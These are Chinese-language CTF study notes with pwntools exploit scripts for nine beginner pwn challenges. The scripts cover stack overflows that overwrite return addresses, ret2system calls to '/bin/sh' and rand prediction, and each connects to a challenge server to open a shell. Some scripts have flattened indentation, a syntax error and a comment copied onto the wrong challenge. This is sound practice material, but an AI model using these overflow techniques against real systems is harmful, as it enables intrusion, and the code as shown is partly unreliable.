Tips:
ubuntu执行属性为executable (application/x-executable)的文件的方法:
1. chmod +x filename
2. ./filename
file filename #查看文件类型
checksec --file=filename #查看文件的保护
#新建py文件
touch 0.py
简单的模板
from pwn import *
context (os='Linux',arch='amd64',log_level='debug')
#context (os='Linux',arch='i386',log_level='debug')
content = 0
sys_addr = 0x401186
def main():
if content == 1:
io = process("./pwn1")
#打本地的程序
else:
io = remote("node4.buuoj.cn",28761)
#打远程服务器上的程序
payload = b'a'*(0xF)+p64(sys_addr)
io.sendline(payload)
io.interactive()
main()#执行main()函数
1、when did you born.
from pwn import *
context (os='linux',arch="amd64",log_level="debug")
content = 1
def main():
if content == 1:
peiqi= = process("1-when_did_you_born")
#打本地的程序
else :
peiqi = remote("220.249.52.133",37645)
#打远程的程序
payload = b'a' * (0x20-0x18) + p64(1926)
#填充垃圾数据+1926的64位编码
peiqi.recvuntil("What's Your Birth?\n")#接收到数据
peiqi.sendline("1900")#发送我们要发送的数据
peiqi.recvuntil("What's Your Name?\n")
peiqi.sendline(payload)
peiqi.interactive()
main() #执行main函数
2、hello_pwn
from pwn import *
context (os='linux',arch="amd64",log_level="debug")
content = 0
def main():
if content == 1:
peiqi = process("2")
#打本地的程序
else :
peiqi = remote("111.200.241.244",64685)
#打远程的程序
payload = b'a' * (0x6c-0x68) + p64(1853186401)
#填充垃圾数据+1926的64位编码
peiqi.recvuntil("lets get helloworld for bof\n")#接收到数据
peiqi.sendline(payload)
peiqi.interactive()
main() #执行main函数
3、level 0
from pwn import *
context (os='linux',arch="amd64",log_level="debug")
content = 0
elf = ELF("0")
system_addr = elf.symbols["callsystem"]#获取地址
def main():
if content == 1:
peiqi = process("0")
#打本地的程序
else :
peiqi = remote("111.200.241.244",51297)
#打远程的程序
payload = b'a' * (0x80 + 8) + p64(system_addr)
peiqi.recvuntil("Hello, World\n")#接收到数据
peiqi.sendline(payload)
peiqi.interactive()
main() #执行main函数
4、level 2
from pwn import *
context (os='linux',arch="x86",log_level="debug")
content = 0
elf = ELF("2")
system_plt_addr = elf.plt["system"]
bin_sh_addr = next(elf.search(b"/bin/sh"))
#查找bin\sh的地址
def main():
if content == 1:
peiqi = process("2")
#打本地的程序
else :
peiqi = remote("111.200.241.244",55628)
#打远程的程序
payload = b'a' * (0x88 + 4) + p32(system_plt_addr)
payload = payload +b"aaaa" + p32(bin_sh_addr)
peiqi.sendlineafter("Input:\n",payload)#接收到数据
peiqi.interactive()
main() #执行main函数
5、guess_num
from platform import libc_ver
from pwn import *
from ctypes import *
context (os='linux',arch="amd64",log_level="debug")
content = 0
def srand():
lib = cdll.LoadLibrary("libc.so.6")
lib.srand(1)
for i in range(10):
number = str(lib.rand()%6 + 1)
peiqi.recvuntil("Welcome to a guess number game!")
peiqi.sendline(number)
def main():
global peiqi
try:
if content == 1:
peiqi = process("2")
#打本地的程序
else :
peiqi = remote("111.200.241.244",52742)
#打远程的程序
except:
print("[!!]the exp is content erroe~\n")
payload = b"a" * (0x30-0x10) + p64(1)
peiqi.recvuntil("Your name:")
peiqi.sendline(payload)
srand()
peiqi.interactive()
main() #执行main函数
6、rip
from pwn import *
context (os='linux',arch="amd64",log_level="debug")
content = 0
elf = ELF("pwn1")
system_addr = elf.symbols["fun"]#获取地址
def main():
if content == 1:
peiqi = process("pwn1")
#打本地的程序
else :
peiqi = remote("node4.buuoj.cn",29944)
#打远程的程序
payload = b'a' * (0x0f-0x00) + p64(system_addr)
peiqi.sendline(payload)
peiqi.interactive()
main() #执行main函数
7、guess_num
from pwn import *
context (os='Linux',arch='amd64',log_level='debug')
#context (os='Linux',arch='i386',log_level='debug')
content = 0
sys_addr = 0x401186
def main():
if content == 1:
io = process("./pwn1")
#打本地的程序
else:
io = remote("111.200.241.244",57277)
#打远程服务器上的程序
payload = b'a'*(0x20)+p64(0)
io.sendlineafter("Your name:", payload)
rand = ['2','5','4','2','6','2','5','1','4','2']
for i in range(10):
io.sendlineafter("Please input your guess number:",rand[i])
io.interactive()
main()#执行main()函数
8、int_overflow
from pwn import *
#context (os='Linux',arch='amd64',log_level='debug')
context (os='Linux',arch='i386',log_level='debug')
content = 0
sys_addr = 0x804868B
def main():
if content == 1:
io = process("./pwn1")
#打本地的程序
else:
io = remote("111.200.241.244", 64970)
#打远程服务器上的程序
payload = b'a'*(0x18)+p32(sys_addr)
payload = payload.ljust(262, b'a')
#将字符串长度补充至(258,263]位
io.recvuntil("Your choice:")
io.sendline('1')
io.recvuntil("username:")
io.sendline('asd')
io.recvuntil("passwd:")
io.sendline(payload)
io.interactive()
main()#执行main()函数
9、cgpwn2
from pwn import *
#context (os='Linux',arch='amd64',log_level='debug')
#context (os='Linux',arch='i386',log_level='debug')
elf = ELF('./1')
content = 0
sys_addr = elf.symbols['system']
my_addr = 0x804A080
def main():
if content == 1:
io = process("./pwn1")
#打本地的程序
else:
io = remote("111.200.241.244", 61382)
#打远程服务器上的程序
payload = b'a'*(0x26+4)+p32(sys_addr)+p32(0)+p32(my_addr)
io.recv()
io.sendline('bin/sh\x00')
io.recv()
io.sendline(payload)
io.interactive()
main()#执行main()函数